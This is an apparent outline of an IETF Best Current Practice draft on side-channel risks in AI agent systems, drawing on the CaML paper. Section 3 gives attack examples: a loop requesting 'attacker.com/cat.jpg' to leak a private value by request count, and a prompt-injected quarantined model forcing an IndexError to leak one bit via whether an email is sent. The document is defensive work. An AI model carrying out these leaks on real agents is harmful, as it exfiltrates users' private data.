Files

Christian Nennemann 5ec7410b89 feat: proposal intake pipeline with AI-powered generation on /proposals/new

Add full proposal system: DB schema (proposals + proposal_gaps tables),
CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new.
The new page merges AI intake (paste URL/text → Haiku generates multiple
proposals auto-linked to gaps) with manual form entry. Generated proposals
are clickable cards that fill the editor below for refinement.

Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes
CaML-inspired draft proposals from arXiv:2503.18813 analysis.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

2026-03-09 03:15:11 +01:00

10 KiB

Raw Blame History

title, draft_name, intended_wg, status, gaps_addressed, camel_sections, document_type, date

title

draft_name

intended_wg

status

gaps_addressed

camel_sections

document_type

date

Side-Channel Mitigation Framework for AI Agent Interactions

draft-nennemann-ai-agent-side-channels-00

SECDISPATCH (BCP)

outline

BCP (Best Current Practice)

2026-03-09

Side-Channel Mitigation Framework for AI Agent Interactions

1. Problem Statement

Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — side-channel attacks can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

External resource inference: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
Exception-based bit leaking: an adversary triggers conditional exceptions that reveal one bit of private data per exception
Timing side-channels: an adversary infers private values from execution timing differences

These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.

This document is a Best Current Practice (BCP) guide for mitigating side-channel risks in AI agent systems.

2. Scope

This document provides:

A taxonomy of side-channel risks specific to AI agent systems
Mitigation strategies for each risk category
Tool API design guidelines that minimize side-channel exposure
Monitoring patterns for detecting side-channel exploitation
STRICT vs. NORMAL mode recommendations

3. Side-Channel Taxonomy

3.1 External Resource Inference

Attack: Agent code iterates over a private value (e.g., for i in range(private_var): fetch("attacker.com/cat.jpg")). The attacker counts requests to infer the private value.

CaML context: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, fetch() inside the loop inherits the dependency on private_var and policies can block it.

Bandwidth: up to log₂(max_value) bits per interaction (or more with range-based inference).

Attacker's Server
     │
     │  GET /cat.jpg  ×10  ← private_var = 10
     │  GET /cat.jpg  ×20  ← private_var = 20
     │
     └── attacker infers private_var by counting requests

3.2 Exception-Based Bit Leaking

Attack: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.

CaML context: The Q-LLM can be influenced to return a value that causes an IndexError (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception

Bandwidth: 1 bit per exception (was the subsequent action observed or not?).

3.3 Timing Side-Channels

Attack: Agent execution time depends on private data. For example, if time.sleep(private_var) is possible, the attacker measures response time.

CaML context: CaML's restricted Python subset doesn't include time, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

Bandwidth: depends on timing precision — generally low but non-zero.

3.4 Agent-Specific Side Channels (Beyond CaML)

Channel	Attack Vector	Bandwidth
Token usage	Private data influences response length → observable token count	Medium
Tool selection pattern	Which tools are called reveals information about private data	Medium
Error message content	Error details leak through supposedly sanitized channels	High
Model confidence	Probability distributions in structured output leak information	Low
Resource consumption	CPU/memory usage patterns depend on private data	Low

4. Mitigation Strategies

4.1 STRICT Mode Execution

Recommendation: Use STRICT mode for all security-sensitive agent operations.

In STRICT mode:

All statements inside if/for/while blocks inherit dependencies from the condition/iterator
This means a fetch() inside for i in range(private_var) will have private_var in its dependency graph
Security policies can detect and block the side-channel

Trade-off: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.

4.2 Exception Handling Hardening

Recommendation: Use error-value types instead of exceptions for data-dependent operations.

Exceptions create side channels because they halt execution. Instead:

# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except:
    pass  # attacker observes: was email sent?

# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way

Agent frameworks SHOULD:

Use Result/Either types instead of exceptions for Processor outputs
Ensure both success and failure paths make the same external observations
Redact exception messages before they reach the Planner

4.3 Constant-Pattern Tool Calls

Recommendation: Where feasible, make tool call patterns independent of private data.

Avoid data-dependent loops that make external calls
Use batch operations instead of per-item calls
Pad tool call sequences to fixed lengths for sensitive operations

4.4 External Request Restrictions

Recommendation: Restrict which external endpoints agents can contact.

Allowlist approved external domains
Proxy all external requests through a controlled gateway
Rate-limit external requests per agent session
Log all external requests for anomaly detection

5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

5.1 Do

Return consistent response structures regardless of input
Use fixed-size responses where possible
Include provenance metadata in all outputs
Document trust levels of output fields (which are public, which are private)

5.2 Don't

Return variable-length arrays that depend on private data in observable ways
Include internal identifiers in error messages
Use response timing that depends on input sensitivity
Expose iteration counts or batch sizes in responses

5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}

6. Monitoring Patterns

6.1 Anomaly Detection Signals

Signal	Potential Attack	Action
Repeated requests to same external URL	External resource inference	Rate limit + alert
Unusually high exception rate	Exception-based bit leaking	Halt + review
Execution time variance > threshold	Timing side-channel	Log + investigate
Tool call patterns differ from plan	Control flow manipulation	Emergency halt
Same agent repeatedly hitting policy denials	Probing attack	Throttle + alert

6.2 Monitoring Architecture

Agent Execution
     │
     ├──► Side-Channel Monitor
     │       ├── Request pattern analyzer
     │       ├── Exception rate tracker
     │       ├── Timing variance detector
     │       └── Tool call pattern validator
     │              │
     │              ▼
     │         Alert / Halt Decision
     │
     ▼
Normal execution continues (if no anomaly)

7. Relationship to Other Drafts

Draft	Side-Channel Relevance
Draft 1 (Capabilities)	Capability metadata enables policy checks that detect side channels
Draft 2 (Flow Integrity)	STRICT mode DFG tracking is the primary side-channel mitigation
Draft 3 (Provenance)	Provenance metadata itself can be a side channel — needs protection
Draft 4 (Policy Federation)	Policy denial patterns across organizations can leak info
Draft 5 (Execution Model)	Isolation architecture is the first line of defense

8. Security Considerations

This entire document is about security. Key meta-considerations:

Side-channel mitigation is defense in depth — no single measure eliminates all channels
The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
Side-channel monitoring itself can create privacy issues (logging all agent interactions)

9. Open Questions

Formal analysis: can we formally prove bounds on information leakage for a given agent configuration?
Adaptive adversaries: as mitigations are deployed, attackers will find new channels. How to stay ahead?
Overhead budget: what is the acceptable performance overhead for side-channel mitigation?
Multi-agent amplification: do side channels in multi-agent systems compose (leak more than single-agent)?

10. References

Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.

10 KiB Raw Blame History Unescape Escape

Side-Channel Mitigation Framework for AI Agent Interactions

1. Problem Statement

2. Scope

3. Side-Channel Taxonomy

3.1 External Resource Inference

3.2 Exception-Based Bit Leaking

3.3 Timing Side-Channels

3.4 Agent-Specific Side Channels (Beyond CaML)

4. Mitigation Strategies

4.1 STRICT Mode Execution

4.2 Exception Handling Hardening

4.3 Constant-Pattern Tool Calls

4.4 External Request Restrictions

5. Tool API Design Guidelines

5.1 Do

5.2 Don't

5.3 Tool Capability Annotations

6. Monitoring Patterns

6.1 Anomaly Detection Signals

6.2 Monitoring Architecture

7. Relationship to Other Drafts

8. Security Considerations

9. Open Questions

10. References

10 KiB

Raw Blame History